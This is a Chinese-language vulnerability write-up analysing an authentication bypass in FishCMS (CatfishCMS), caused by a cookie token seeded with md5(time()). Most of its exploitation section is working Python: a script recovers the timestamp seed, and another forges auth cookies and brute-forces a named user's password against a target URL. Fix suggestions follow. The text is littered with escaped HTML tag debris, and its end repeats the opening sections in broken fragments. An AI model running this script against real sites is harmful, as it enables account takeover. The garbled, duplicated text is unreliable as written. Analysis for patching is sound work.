FishCMS 认证绕过漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析 FishCMS (CatfishCMS) 中的一个有趣的认证绕过漏洞，该漏洞允许攻击者在知道目标用户名的情况下，通过爆破密码来绕过认证机制。<\/p>

漏洞发现位置<\/h2>
漏洞存在于 `user\/controller\/common.php<\/code> 文件中的认证逻辑。<\/p>`

关键代码分析<\/h2>
认证流程<\/h3>
认证流程包含三个关键判断条件：<\/p>
\/\/ 第一个判断条件
<\/span><\/span><\/span><\/span>if<\/span>(
<\/span><\/span>    !<\/span>Session<\/span>::<\/span>has<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user_id'<\/span>) 
<\/span><\/span>    &&<\/span> Cookie<\/span>::<\/span>has<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user_id'<\/span>) 
<\/span><\/span>    &&<\/span> Cookie<\/span>::<\/span>has<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user'<\/span>)
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>\/\/ 第二个判断条件
<\/span><\/span><\/span><\/span>$cookie_user_p =<\/span> Cache<\/span>::<\/span>get<\/span>('cookie_user_p'<\/span>);
<\/span><\/span>if<\/span>(
<\/span><\/span>    Cookie<\/span>::<\/span>has<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user_p'<\/span>) 
<\/span><\/span>    &&<\/span> $cookie_user_p !==<\/span> false<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>\/\/ 第三个判断条件
<\/span><\/span><\/span><\/span>$user =<\/span> 从数据库中查找<\/span> $_COOKIE['user'<\/span>] 对应的<\/span> pass<\/span> 和<\/span> user_type<\/span>
<\/span><\/span>if<\/span>(
<\/span><\/span>    !<\/span>empty<\/span>($user) 
<\/span><\/span>    &&<\/span> md5<\/span>($cookie_user_p.<\/span>$user['user_pass'<\/span>]) ==<\/span> Cookie<\/span>::<\/span>get<\/span>($this-><\/span>session_prefix<\/span>.<\/span>'user_p'<\/span>)
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>关键变量说明<\/h3>

$this->session_prefix<\/code>：由网站根目录生成，格式为 catfish<\/code> + 根目录值（替换特殊字符）<\/li>
$cookie_user_p<\/code>：通过 Cache::get('cookie_user_p')<\/code> 获取，仅在登录时设置<\/li>
<\/ol>
认证令牌生成<\/h3>
登录时生成的关键代码：<\/p>
$cookie_user_p =<\/span> md5<\/span>(time<\/span>()); \/\/ 使用当前时间戳的MD5作为种子
<\/span><\/span><\/span><\/span>Cookie<\/span>::<\/span>set<\/span>(前缀<\/span>.<\/span>'user_p'<\/span>, md5<\/span>($cookie_user_p.<\/span>$user['user_pass'<\/span>]), 604800<\/span>);
<\/span><\/span><\/code><\/pre>漏洞原理<\/h2>

认证依赖<\/strong>：系统在用户未登录时，允许通过Cookie中的信息进行认证<\/li>
弱随机数<\/strong>：$cookie_user_p<\/code> 使用 md5(time())<\/code> 生成，可被爆破<\/li>
持久性<\/strong>：注销操作不会清除Cache中的 cookie_user_p<\/code> 值<\/li>
<\/ol>
漏洞利用步骤<\/h2>
1. 获取必要信息<\/h3>

正常登录一个账户，勾选"记住我"<\/li>
记录登录后的Cookie：

catfishCatfishCMS|4?8?75user_p<\/code> (示例值: 7541e2cc792bd77faf926e96a6006031<\/code>)<\/li>
前缀 (catfishCatfishCMS|4?8?75<\/code>)<\/li>
<\/ul>
<\/li>
<\/ol>
2. 爆破 $cookie_user_p<\/code><\/h3>
使用近似时间戳爆破：<\/p>
import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>def<\/span> md5<\/span>(s):
<\/span><\/span>    return<\/span> hashlib.<\/span>md5(s.<\/span>encode()).<\/span>hexdigest()
<\/span><\/span>
<\/span><\/span>cookie_user_p =<\/span> 1558287843<\/span> # 近似时间戳<\/span>
<\/span><\/span>login_password =<\/span> '123456'<\/span> # 已知密码<\/span>
<\/span><\/span>target_hash =<\/span> "7541e2cc792bd77faf926e96a6006031"<\/span> # 示例user_p<\/span>
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    if<\/span> md5(md5(str(cookie_user_p)) +<\/span> md5(login_password)) ==<\/span> target_hash:
<\/span><\/span>        break<\/span>
<\/span><\/span>    cookie_user_p -=<\/span> 1<\/span>
<\/span><\/span>
<\/span><\/span>print(cookie_user_p) # 输出爆破出的时间戳<\/span>
<\/span><\/span><\/code><\/pre>3. 构造攻击Cookie<\/h3>
爆破出正确的时间戳后，构造以下Cookie：<\/p>
catfishCatfishCMS|4?8?75user_id=any
catfishCatfishCMS|4?8?75user=目标用户名
catfishCatfishCMS|4?8?75user_p=md5(md5(爆破出的时间戳)+md5(目标密码))
<\/code><\/pre>
4. 自动化爆破脚本<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>
<\/span><\/span>passwords =<\/span> [
<\/span><\/span>    '123456'<\/span>, '12345'<\/span>, '123456789'<\/span>, 'password'<\/span>, 'iloveyou'<\/span>,
<\/span><\/span>    'princess'<\/span>, '1234567'<\/span>, 'rockyou'<\/span>, '12345678'<\/span>, 'abc123'<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>def<\/span> md5<\/span>(s):
<\/span><\/span>    return<\/span> hashlib.<\/span>md5(s.<\/span>encode()).<\/span>hexdigest()
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target.com\/user.html"<\/span>
<\/span><\/span>session_prefix =<\/span> 'catfishCatfishCMS|4?8?75'<\/span> # 前缀<\/span>
<\/span><\/span>user_p =<\/span> '7541e2cc792bd77faf926e96a6006031'<\/span> # 示例user_p<\/span>
<\/span><\/span>login_password =<\/span> '123456'<\/span> # 已知密码<\/span>
<\/span><\/span>cookie_user_p =<\/span> 1558287843<\/span> # 近似时间戳<\/span>
<\/span><\/span>
<\/span><\/span># 爆破时间戳<\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    if<\/span> md5(md5(str(cookie_user_p))+<\/span>md5(login_password)) ==<\/span> user_p:
<\/span><\/span>        break<\/span>
<\/span><\/span>    cookie_user_p -=<\/span> 1<\/span>
<\/span><\/span>
<\/span><\/span># 爆破目标账户<\/span>
<\/span><\/span>username =<\/span> 'target_user'<\/span>
<\/span><\/span>for<\/span> passwd in<\/span> passwords:
<\/span><\/span>    print(f<\/span>"Testing: <\/span>{<\/span>passwd}<\/span>"<\/span>)
<\/span><\/span>    cookie =<\/span> {
<\/span><\/span>        "think_var"<\/span>: "zh-cn"<\/span>,
<\/span><\/span>        "PHPSESSID"<\/span>: "session_id"<\/span>,
<\/span><\/span>        session_prefix+<\/span>"user_id"<\/span>: "any"<\/span>,
<\/span><\/span>        session_prefix+<\/span>"user"<\/span>: username,
<\/span><\/span>        session_prefix+<\/span>"user_p"<\/span>: md5(md5(str(cookie_user_p))+<\/span>md5(passwd)),
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    r =<\/span> requests.<\/span>get(url, cookies=<\/span>cookie, allow_redirects=<\/span>False<\/span>)
<\/span><\/span>    if<\/span> 'location'<\/span> not<\/span> in<\/span> r.<\/span>headers or<\/span> 'login'<\/span> not<\/span> in<\/span> r.<\/span>headers.<\/span>get('location'<\/span>, ''<\/span>):
<\/span><\/span>        print(f<\/span>"Success! Credentials: <\/span>{<\/span>username}<\/span>:<\/span>{<\/span>passwd}<\/span>"<\/span>)
<\/span><\/span>        break<\/span>
<\/span><\/span><\/code><\/pre>漏洞修复建议<\/h2>

使用更强的随机数生成 $cookie_user_p<\/code>，如：
$cookie_user_p =<\/span> md5<\/span>(uniqid<\/span>(mt_rand<\/span>(), true<\/span>));
<\/span><\/span><\/code><\/pre><\/li>
在注销时清除Cache中的 cookie_user_p<\/code> 值<\/li>
增加密码尝试次数限制<\/li>
使用更强的哈希算法（如bcrypt）替代简单的MD5<\/li>
<\/ol>
漏洞影响<\/h2>
该漏洞允许攻击者在知道用户名的情况下：<\/p>

爆破用户密码<\/li>
绕过认证机制<\/li>
获取用户会话<\/li>
<\/ol>
虽然需要知道目标用户名，但在CMS系统中，用户名往往容易获取（如作者名、管理员名等）。<\/p>
总结<\/h2>
FishCMS的这个认证绕过漏洞展示了几个常见的安全问题：<\/p>

弱随机数使用<\/li>
不完整的会话清理<\/li>
依赖客户端可控的认证令牌<\/li>
简单的哈希算法<\/li>
<\/ol>
开发人员应当注意认证逻辑中的这些陷阱，使用更强的加密方法和更完善的会话管理机制。<\/p>

FishCMS 认证绕过漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析 FishCMS (CatfishCMS) 中的一个有趣的认证绕过漏洞，该漏洞允许攻击者在知道目标用户名的情况下，通过爆破密码来绕过认证机制。<\/p>

漏洞发现位置<\/h2> 漏洞存在于 user\/controller\/common.php<\/code> 文件中的认证逻辑。<\/p>

漏洞利用步骤<\/h2>

漏洞概述<\/h2>
本文详细分析 FishCMS (CatfishCMS) 中的一个有趣的认证绕过漏洞，该漏洞允许攻击者在知道目标用户名的情况下，通过爆破密码来绕过认证机制。<\/p>

漏洞发现位置<\/h2>
漏洞存在于 `user\/controller\/common.php<\/code> 文件中的认证逻辑。<\/p>`